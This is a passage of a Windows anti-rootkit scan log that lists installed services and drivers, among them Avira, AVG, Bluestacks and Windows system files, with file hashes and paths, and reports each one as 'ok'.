16:43:35.0213 0x0dd0  [ 98D7647EF729503A60EF870DA5C21D0D, 7E36E8E3D9D0BD940DC225E1DB7EFD90F76F7BE8DCAD9782255556C31D6FD476 ] AntiVirMailService C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe
16:43:35.0228 0x0dd0  AntiVirMailService - ok
16:43:35.0244 0x0dd0  [ 229E752A26B53E155524D6530B95CDD4, B4D3DEA52860143D16A57EBA31CD3394B8B4FEA642EB3A736C8388447AB7E0E9 ] AntiVirSchedulerService C:\Program Files (x86)\Avira\Antivirus\sched.exe
16:43:35.0244 0x0dd0  AntiVirSchedulerService - ok
16:43:35.0259 0x0dd0  [ 229E752A26B53E155524D6530B95CDD4, B4D3DEA52860143D16A57EBA31CD3394B8B4FEA642EB3A736C8388447AB7E0E9 ] AntiVirService  C:\Program Files (x86)\Avira\Antivirus\avguard.exe
16:43:35.0275 0x0dd0  AntiVirService - ok
16:43:35.0306 0x0dd0  [ F2B26CD2305E917B1EA1BF49E0C59E31, 8CCE64C68B80D56C7604DB6ABD187F66C624462328F4886C607F0A46D8E9DE92 ] AntiVirWebService C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe
16:43:35.0322 0x0dd0  AntiVirWebService - ok
16:43:35.0337 0x0dd0  [ C3D487827E48CC5EC17994FEC5BDFF87, 5FCEA3EEA583755D0C9F6005ED3032E9DFECB57F504DC67701AE7D2D2631C30E ] AODDriver4.3    C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys
16:43:35.0337 0x0dd0  AODDriver4.3 - ok
16:43:35.0337 0x0dd0  [ FCE5C79717A487BDC71F3DEC78A684CA, F5520F112A4EBDD10444AA5E9FDB9125219FCF768FEB95AB608BC84D60136816 ] AppID           C:\Windows\system32\drivers\appid.sys
16:43:35.0337 0x0dd0  AppID - ok
16:43:35.0353 0x0dd0  [ 8921E1D8AE5171691F186A7C5B98B630, 4A37313BB94D4B49D0294C9439AD0793DE328F9F4DA1C47E34E6ACEA46AF6E14 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
16:43:35.0353 0x0dd0  AppIDSvc - ok
16:43:35.0353 0x0dd0  [ DE23E052E557580674785CDF45B613F3, A955ADC6CC7D816BA7CE1065F911E7A3295A1908C22BE0A3C506C38CFEE8DE0D ] Appinfo         C:\Windows\System32\appinfo.dll
16:43:35.0353 0x0dd0  Appinfo - ok
16:43:35.0369 0x0dd0  [ 4ABA3E75A76195A3E38ED2766C962899, E2001ACD44DA270B8289DA362D26416676301773AB22616C211F31CF2E7869AA ] AppMgmt         C:\Windows\System32\appmgmts.dll
16:43:35.0369 0x0dd0  AppMgmt - ok
16:43:35.0369 0x0dd0  [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc             C:\Windows\system32\drivers\arc.sys
16:43:35.0369 0x0dd0  arc - ok
16:43:35.0369 0x0dd0  [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas          C:\Windows\system32\drivers\arcsas.sys
16:43:35.0384 0x0dd0  arcsas - ok
16:43:35.0400 0x0dd0  [ EE424A5CE56E3923D59BB7DE2E15036D, 8B8196870EFE74D43EDA72674021A46846D370E97A6A058134D84A721AECD091 ] aspnet_state    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
16:43:35.0400 0x0dd0  aspnet_state - ok
16:43:35.0400 0x0dd0  [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
16:43:35.0400 0x0dd0  AsyncMac - ok
16:43:35.0415 0x0dd0  [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi           C:\Windows\system32\drivers\atapi.sys
16:43:35.0415 0x0dd0  atapi - ok
16:43:35.0415 0x0dd0  [ F9DB31BC5CD3700D37DB136BA56E5E9D, 9AB7421975500EE7FE583CCF86914F94E697606A9199DC4F27D5609554C5D3F7 ] AtiHDAudioService C:\Windows\system32\drivers\AtihdW76.sys
16:43:35.0415 0x0dd0  AtiHDAudioService - ok
16:43:35.0431 0x0dd0  [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
16:43:35.0447 0x0dd0  AudioEndpointBuilder - ok
16:43:35.0462 0x0dd0  [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioSrv        C:\Windows\System32\Audiosrv.dll
16:43:35.0462 0x0dd0  AudioSrv - ok
16:43:35.0478 0x0dd0  [ 8369A6E2611D2BA79871B655A650DE59, 101C8C660F0720CAF501EE108209C792933F6907B1A15321ADDE7C247BDA8211 ] avgntflt        C:\Windows\system32\DRIVERS\avgntflt.sys
16:43:35.0478 0x0dd0  avgntflt - ok
16:43:35.0509 0x0dd0  [ 77886F050DE9D0296B4BA7D7AD13A0BA, 132DADE478A11207984AF96A7049C872AFB02E46A5B4149050D3BC1A96F995ED ] avgsvc          C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
16:43:35.0525 0x0dd0  avgsvc - ok
16:43:35.0525 0x0dd0  [ 5FEFD9961A750C395D3A6AD1985B05B2, 31C3B9EDE4C49ED433BE19CD6A1B74F54947FC1DCA3886A83A281F6E8CA02FF0 ] avipbb          C:\Windows\system32\DRIVERS\avipbb.sys
16:43:35.0540 0x0dd0  avipbb - ok
16:43:35.0556 0x0dd0  [ 2AEE4D1D7E668F1CCF97EDE93509B0EE, B082B3BBB27D3C8B26A754508C3B98BA803FEA707898FF18A120D6A2679098DF ] Avira.ServiceHost C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
16:43:35.0556 0x0dd0  Avira.ServiceHost - ok
16:43:35.0556 0x0dd0  [ 390184FAD8FCC1B6DA25AEBAE928C3B6, 537B0E0FAE080B55D70E990BBA0F7F22903CA340F6A42039BAD617A8ECF59119 ] avkmgr          C:\Windows\system32\DRIVERS\avkmgr.sys
16:43:35.0556 0x0dd0  avkmgr - ok
16:43:35.0571 0x0dd0  [ 1DC2F715792CF33428AD7993ACBD224D, 129FBD517E016914CD61C35894C0B9B2074E680F1EB21201597E5C13CAF4529F ] avmeject        C:\Windows\system32\drivers\avmeject.sys
16:43:35.0571 0x0dd0  avmeject - ok
16:43:35.0571 0x0dd0  [ D4871FF3649B3681EDF44D0B29AB6962, 6F69233D8F19280DED9A75B7544F0DF721CCDEF5AE70192833A8F32710FAB7B0 ] AvmSwitchUsb    C:\Program Files (x86)\avmwlanstick\AVMSwitchUsb.exe
16:43:35.0571 0x0dd0  AvmSwitchUsb - ok
16:43:35.0571 0x0dd0  [ 138A53D17B040F5A3A307D44A89D0905, AD212E430F2DE43F037BECF6A46FCD53270A5EE11427030C7D5CBC3EAAAAA029 ] avnetflt        C:\Windows\system32\DRIVERS\avnetflt.sys
16:43:35.0571 0x0dd0  avnetflt - ok
16:43:35.0587 0x0dd0  [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV        C:\Windows\System32\AxInstSV.dll
16:43:35.0587 0x0dd0  AxInstSV - ok
16:43:35.0603 0x0dd0  [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv         C:\Windows\system32\drivers\bxvbda.sys
16:43:35.0603 0x0dd0  b06bdrv - ok
16:43:35.0618 0x0dd0  [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a        C:\Windows\system32\DRIVERS\b57nd60a.sys
16:43:35.0618 0x0dd0  b57nd60a - ok
16:43:35.0618 0x0dd0  backlh - ok
16:43:35.0634 0x0dd0  [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC          C:\Windows\System32\bdesvc.dll
16:43:35.0634 0x0dd0  BDESVC - ok
16:43:35.0634 0x0dd0  [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep            C:\Windows\system32\drivers\Beep.sys
16:43:35.0634 0x0dd0  Beep - ok
16:43:35.0649 0x0dd0  [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE             C:\Windows\System32\bfe.dll
16:43:35.0665 0x0dd0  BFE - ok
16:43:35.0681 0x0dd0  [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS            C:\Windows\System32\qmgr.dll
16:43:35.0696 0x0dd0  BITS - ok
16:43:35.0696 0x0dd0  [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
16:43:35.0696 0x0dd0  blbdrive - ok
16:43:35.0712 0x0dd0  [ ABA3984C822E4D3F889699912D85D6C5, 2251FA135CC290DA13DAE4743F393C7CC9E6A737C054707CB8D72C369D1FFACB ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
16:43:35.0712 0x0dd0  bowser - ok
16:43:35.0712 0x0dd0  [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo        C:\Windows\system32\drivers\BrFiltLo.sys
16:43:35.0712 0x0dd0  BrFiltLo - ok
16:43:35.0712 0x0dd0  [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp        C:\Windows\system32\drivers\BrFiltUp.sys
16:43:35.0712 0x0dd0  BrFiltUp - ok
16:43:35.0712 0x0dd0  [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser         C:\Windows\System32\browser.dll
16:43:35.0727 0x0dd0  Browser - ok
16:43:35.0727 0x0dd0  [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
16:43:35.0727 0x0dd0  Brserid - ok
16:43:35.0743 0x0dd0  [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
16:43:35.0743 0x0dd0  BrSerWdm - ok
16:43:35.0743 0x0dd0  [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
16:43:35.0743 0x0dd0  BrUsbMdm - ok
16:43:35.0743 0x0dd0  [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
16:43:35.0743 0x0dd0  BrUsbSer - ok
16:43:35.0759 0x0dd0  [ BAE627D4CB8DDBB49E0C1CA046064B8F, D9EB07A83C3B30DD1B3893576224C69B511E7CBC9F3CE5FC673CBFB60849A705 ] BstHdAndroidSvc C:\Program Files (x86)\Bluestacks\HD-Service.exe
16:43:35.0759 0x0dd0  BstHdAndroidSvc - ok
16:43:35.0774 0x0dd0  [ ED76DA4C27471C4B608CD72CB34BA7F5, 9E7552D9B8870BE330FB7E4CFE082DB48E951B81F30893D4D78B8D1CC6EE7544 ] BstHdDrv        C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys
16:43:35.0774 0x0dd0  BstHdDrv - ok
16:43:35.0790 0x0dd0  [ 81ABF4CE9C745A140D03085B4B6EED2E, 1237F36C0650DFD2646CC84F043B7370E83FBCC082D36E2DBA87A91A019CD651 ] BstHdLogRotatorSvc C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe
16:43:35.0790 0x0dd0  BstHdLogRotatorSvc - ok
16:43:35.0805 0x0dd0  [ C000D33EB6FB580DEE85D54080BA6AEE, BA99D36EED17EBA6487648B3D8BDCCAA1EA09120EFCBE7F750FAD3B25DF50251 ] BstHdPlusAndroidSvc C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe
16:43:35.0805 0x0dd0  BstHdPlusAndroidSvc - ok
16:43:35.0821 0x0dd0  [ FD2EFBD92116F5BCF26BC22620AE7BCC, ADB2FB890CC685F86B981FB96B7E5984463DF1C40D8E060BA7F1F2FEC3D125AC ] BstkDrv         C:\Program Files (x86)\Bluestacks\BstkDrv.sys
16:43:35.0821 0x0dd0  BstkDrv - ok
16:43:35.0837 0x0dd0  [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM        C:\Windows\system32\drivers\bthmodem.sys
16:43:35.0837 0x0dd0  BTHMODEM - ok
16:43:35.0837 0x0dd0  [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv         C:\Windows\system32\bthserv.dll
16:43:35.0837 0x0dd0  bthserv - ok
16:43:35.0837 0x0dd0  [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
16:43:35.0837 0x0dd0  cdfs - ok
16:43:35.0852 0x0dd0  [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
16:43:35.0852 0x0dd0  cdrom - ok
16:43:35.0852 0x0dd0  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc     C:\Windows\System32\certprop.dll
16:43:35.0852 0x0dd0  CertPropSvc - ok
16:43:35.0868 0x0dd0  [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass        C:\Windows\system32\drivers\circlass.sys
16:43:35.0868 0x0dd0  circlass - ok
16:43:35.0883 0x0dd0  [ 3D67C27DD17B254D7915FA16A5AE3573, 5B3A6C6A7F940C06362775DAF13CEADA37C7AA84A509458A57C23B4369970A90 ] CLFS            C:\Windows\system32\CLFS.sys
16:43:35.0883 0x0dd0  CLFS - ok
16:43:35.0977 0x0dd0  [ CB6AC02C92BBA30187EA4591D771660E, B3BB15DC814F131672D864CAAD1537933EE83C9029DF143E5E105077EA4D7F30 ] ClickToRunSvc   C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
16:43:36.0024 0x0dd0  ClickToRunSvc - ok
16:43:36.0039 0x0dd0  [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
16:43:36.0039 0x0dd0  clr_optimization_v2.0.50727_32 - ok
16:43:36.0055 0x0dd0  [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
16:43:36.0055 0x0dd0  clr_optimization_v2.0.50727_64 - ok
16:43:36.0071 0x0dd0  [ 5BAF4F1296D4D91FC28560CDB4C37C4B, ACA4BC57ED1F8432F18F0F215EC7FF956BAEF6E02760779E264E4008A979E9DD ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
16:43:36.0071 0x0dd0  clr_optimization_v4.0.30319_32 - ok
16:43:36.0086 0x0dd0  [ 569B54004A7E85A74FD92841DE6058E2, 58949313D0F6B1C06359B2F3C68E29940B1655A17E93FFC3718F6D2EAE1633E4 ] clr_optimization_v4.0.30319_64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
16:43:36.0086 0x0dd0  clr_optimization_v4.0.30319_64 - ok
16:43:36.0086 0x0dd0  [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt          C:\Windows\system32\drivers\CmBatt.sys
16:43:36.0086 0x0dd0  CmBatt - ok
16:43:36.0086 0x0dd0  [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide          C:\Windows\system32\drivers\cmdide.sys
16:43:36.0086 0x0dd0  cmdide - ok
16:43:36.0102 0x0dd0  [ A98CED39AD91B445E2E442A9BD67E8B4, B4189DEEF1C0EE22AE983119047B1A40FFDD8F3E163DFFABD7C2706231B0B1B0 ] CNG             C:\Windows\system32\Drivers\cng.sys
16:43:36.0117 0x0dd0  CNG - ok
16:43:36.0117 0x0dd0  [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt        C:\Windows\system32\drivers\compbatt.sys
16:43:36.0117 0x0dd0  Compbatt - ok
16:43:36.0117 0x0dd0  [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus    C:\Windows\system32\DRIVERS\CompositeBus.sys
16:43:36.0117 0x0dd0  CompositeBus - ok
16:43:36.0117 0x0dd0  COMSysApp - ok
16:43:36.0117 0x0dd0  [ 1C827878A998C18847245FE1F34EE597, 41EF7443D8B2733AA35CAC64B4F5F74FAC8BB0DA7D3936B69EC38E2DC3972E60 ] crcdisk         C:\Windows\system32\drivers\crcdisk.sys
16:43:36.0117 0x0dd0  crcdisk - ok
16:43:36.0133 0x0dd0  [ 2C6632CECFDBBE793FDA8AF9CA55A9CC, 335188515F798483660E529204A13012E4D21B0ECA489224A11C26F91A5B3CCE ] CryptSvc        C:\Windows\system32\cryptsvc.dll
16:43:36.0133 0x0dd0  CryptSvc - ok
16:43:36.0149 0x0dd0  [ 54DA3DFD29ED9F1619B6F53F3CE55E49, 9177C6907A983296BF188892A894B668A09FFA058FD56B50FE12940D54B0FA5E ] CSC             C:\Windows\system32\drivers\csc.sys
16:43:36.0164 0x0dd0  CSC - ok
16:43:36.0180 0x0dd0  [ 3AB183AB4D2C79DCF459CD2C1266B043, 72B0187EBA9DC74E61EC5CB3DC24058DDB768843E865801894AAEAA211610C56 ] CscService      C:\Windows\System32\cscsvc.dll
16:43:36.0180 0x0dd0  CscService - ok
16:43:36.0195 0x0dd0  [ 622C96AFB07BB82C8650B47172137AC4, B74CEA5A3F4945E5A3EAE7AF1B1FA75F611C65C6FACE393052A512FA81B0C17C ] DcomLaunch      C:\Windows\system32\rpcss.dll
16:43:36.0211 0x0dd0  DcomLaunch - ok
16:43:36.0211 0x0dd0  [ 3CEC7631A84943677AA8FA8EE5B6B43D, 32061DAC9ED6C1EBA3B367B18D0E965AEEC2DF635DCF794EC39D086D32503AC5 ] defragsvc       C:\Windows\System32\defragsvc.dll
16:43:36.0227 0x0dd0  defragsvc - ok
16:43:36.0227 0x0dd0  [ 9B38580063D281A99E68EF5813022A5F, D91676B0E0A8E2A090E3E5DD340ABCFC20AE0F55B4C82869D6CFB34239BD27DA ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
16:43:36.0227 0x0dd0  DfsC - ok
16:43:36.0242 0x0dd0  [ 43D808F5D9E1A18E5EEB5EBC83969E4E, C10D1155D71EABE4ED44C656A8F13078A8A4E850C4A8FBB92D52D173430972B8 ] Dhcp            C:\Windows\system32\dhcpcore.dll
16:43:36.0242 0x0dd0  Dhcp - ok
16:43:36.0273 0x0dd0  [ EE9954237F15BE4DD9304D12E4D305ED, F295C9BAF20F0E669B673AFCC16B4969EE31B6A3808980DAB93D9B0F167DA3C0 ] DiagTrack       C:\Windows\system32\diagtrack.dll
16:43:36.0289 0x0dd0  DiagTrack - ok
16:43:36.0289 0x0dd0  [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] discache        C:\Windows\system32\drivers\discache.sys
16:43:36.0305 0x0dd0  discache - ok
16:43:36.0305 0x0dd0  [ 616387BBD83372220B09DE95F4E67BBC, 5E2D5280BB775576E7CDE3FA6BDE494E183123635E5908CF7EBF1FF52966D07D ] Disk            C:\Windows\system32\drivers\disk.sys
16:43:36.0305 0x0dd0  Disk - ok
16:43:36.0305 0x0dd0  [ 5DB085A8A6600BE6401F2B24EECB5415, 5FC5C7C1B4DB7BF6EFD0992E91DB41FD047E90D1ABA0B8F868CB72557F88FB13 ] dmvsc           C:\Windows\system32\drivers\dmvsc.sys
16:43:36.0305 0x0dd0  dmvsc - ok
16:43:36.0320 0x0dd0  [ 16835866AAA693C7D7FCEBA8FFF706E4, 15891558F7C1F2BB57A98769601D447ED0D952354A8BB347312D034DC03E0242 ] Dnscache        C:\Windows\System32\dnsrslvr.dll
16:43:36.0320 0x0dd0  Dnscache - ok
16:43:36.0336 0x0dd0  [ B1FB3DDCA0FDF408750D5843591AFBC6, AB6AD9C5E7BA2E3646D0115B67C4800D1CB43B4B12716397657C7ADEEE807304 ] dot3svc         C:\Windows\System32\dot3svc.dll
16:43:36.0336 0x0dd0  dot3svc - ok
16:43:36.0336 0x0dd0  [ B26F4F737E8F9DF4F31AF6CF31D05820, 394BBBED4EC7FAD4110F62A43BFE0801D4AC56FFAC6C741C69407B26402311C7 ] DPS             C:\Windows\system32\dps.dll
16:43:36.0351 0x0dd0  DPS - ok
16:43:36.0351 0x0dd0  [ 26FE888505E5A945B0536AF9A2A27A6F, A6B16ED498BAFE300E1F0E0A241E3D62F7A1C5973EE775904ED14F33A2BC08A6 ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
16:43:36.0351 0x0dd0  drmkaud - ok
16:43:36.0383 0x0dd0  [ 3A9D7D464BDB3B70D7ECF689ADABBD4D, B4F5B23705EA1BA453FE30791CA245E1A5F7FBEABAD026E4A8A15A9FC44E8C9C ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
16:43:36.0398 0x0dd0  DXGKrnl - ok
16:43:36.0398 0x0dd0  [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost         C:\Windows\System32\eapsvc.dll
16:43:36.0398 0x0dd0  EapHost - ok
16:43:36.0461 0x0dd0  [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv           C:\Windows\system32\drivers\evbda.sys
16:43:36.0523 0x0dd0  ebdrv - ok
16:43:36.0523 0x0dd0  [ 1F9335A2C68B65E7D95985FA50968EA0, A0918C943F9CF5C6DB9440222B8E3B0DD645068B44E18253F275509550C0DF4D ] EFS             C:\Windows\System32\lsass.exe
16:43:36.0523 0x0dd0  EFS - ok
16:43:36.0539 0x0dd0  [ C4002B6B41975F057D98C439030CEA07, 3D2484FBB832EFB90504DD406ED1CF3065139B1FE1646471811F3A5679EF75F1 ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
16:43:36.0554 0x0dd0  ehRecvr - ok
16:43:36.0554 0x0dd0  [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched         C:\Windows\ehome\ehsched.exe
16:43:36.0570 0x0dd0  ehSched - ok
16:43:36.0570 0x0dd0  [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor         C:\Windows\system32\drivers\elxstor.sys
16:43:36.0585 0x0dd0  elxstor - ok
16:43:36.0585 0x0dd0  [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
16:43:36.0585 0x0dd0  ErrDev - ok
16:43:36.0585 0x0dd0  [ FD291A75ECAF197F07BD2040C2A7322A, B4DE1B8A75928C8E6DF870A7B6F286EAA0B9A5D9443E99B66633F8B60013AC67 ] EtronHub3       C:\Windows\system32\Drivers\EtronHub3.sys
16:43:36.0585 0x0dd0  EtronHub3 - ok
16:43:36.0601 0x0dd0  [ DDE9068F9BAC0210195F217AA39B9276, 3AE8CE03B0F93EF6006B46F8DFD5523F6C1951D98FB9A411EA90261C368A453F ] EtronXHCI       C:\Windows\system32\Drivers\EtronXHCI.sys
16:43:36.0601 0x0dd0  EtronXHCI - ok
16:43:36.0617 0x0dd0  [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem     C:\Windows\system32\es.dll
16:43:36.0632 0x0dd0  EventSystem - ok
16:43:36.0632 0x0dd0  [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat           C:\Windows\system32\drivers\exfat.sys
16:43:36.0632 0x0dd0  exfat - ok
16:43:36.0648 0x0dd0  [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
16:43:36.0648 0x0dd0  fastfat - ok
16:43:36.0663 0x0dd0  [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] Fax             C:\Windows\system32\fxssvc.exe
16:43:36.0679 0x0dd0  Fax - ok
16:43:36.0679 0x0dd0  [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc             C:\Windows\system32\drivers\fdc.sys
16:43:36.0679 0x0dd0  fdc - ok
16:43:36.0695 0x0dd0  [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost         C:\Windows\system32\fdPHost.dll
16:43:36.0695 0x0dd0  fdPHost - ok
16:43:36.0695 0x0dd0  [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub        C:\Windows\system32\fdrespub.dll
16:43:36.0695 0x0dd0  FDResPub - ok
16:43:36.0695 0x0dd0  [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
16:43:36.0695 0x0dd0  FileInfo - ok
16:43:36.0710 0x0dd0  [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
16:43:36.0710 0x0dd0  Filetrace - ok
16:43:36.0710 0x0dd0  [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk        C:\Windows\system32\drivers\flpydisk.sys
16:43:36.0710 0x0dd0  flpydisk - ok
16:43:36.0710 0x0dd0  [ DA6B67270FD9DB3697B20FCE94950741, F621A4462C9F2904063578C427FAF22D7D66AE9967605C11C798099817CE5331 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
16:43:36.0726 0x0dd0  FltMgr - ok
16:43:36.0741 0x0dd0  [ 700A5373FA66F1DAAECBD2CFB88C73ED, D6C1C4C846BC24EB6539ECC701A456FA53BB6679C79391F5B70580D47B6CE395 ] FontCache       C:\Windows\system32\FntCache.dll
16:43:36.0773 0x0dd0  FontCache - ok
16:43:36.0773 0x0dd0  [ A8B7F3818AB65695E3A0BB3279F6DCE6, 89FCF10F599767E67A1E011753E34DA44EAA311F105DBF69549009ED932A60F0 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
16:43:36.0773 0x0dd0  FontCache3.0.0.0 - ok
